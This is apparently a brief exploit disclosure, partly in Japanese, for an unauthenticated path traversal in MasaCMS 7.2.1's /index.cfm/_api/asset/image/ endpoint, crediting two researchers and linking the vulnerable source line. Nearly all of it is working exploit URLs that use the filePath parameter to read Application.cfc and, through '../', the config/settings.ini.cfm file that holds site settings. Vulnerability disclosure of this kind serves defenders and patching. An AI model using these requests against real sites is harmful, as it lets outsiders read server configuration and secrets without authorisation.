
MasaCMS 7.2.1 の /index.cfm/_api/asset/image/ を介したパストラバーサルの概念実証エクスプロイト。認証されていない攻撃者が config や Application.cfc などの任意のファイルを読み取ることができます。
MasaCMS 7.2.1 は /index.cfm/_api/asset/image/ におけるパストラバーサルの脆弱性の影響を受けます。
If this file is readable it means the vulnerablilty exists.
https://example.com/index.cfm/_api/asset/image/?filePath=/Application.cfc
https://example.com/index.cfm/_api/asset/image/?filePath=/../<Path>
- Read The Config File
https://example.com/index.cfm/_api/asset/image/?filePath=/../config/settings.ini.cfm
MasaCMS 7.2.1
https://github.com/MasaCMS/MasaCMS https://github.com/MasaCMS/MasaCMS/blob/01e0636db0ea4c132906724e1b0772c86e263ada/core/mura/content/file/fileManager.cfc#L368
Rawi And BassamAssiri.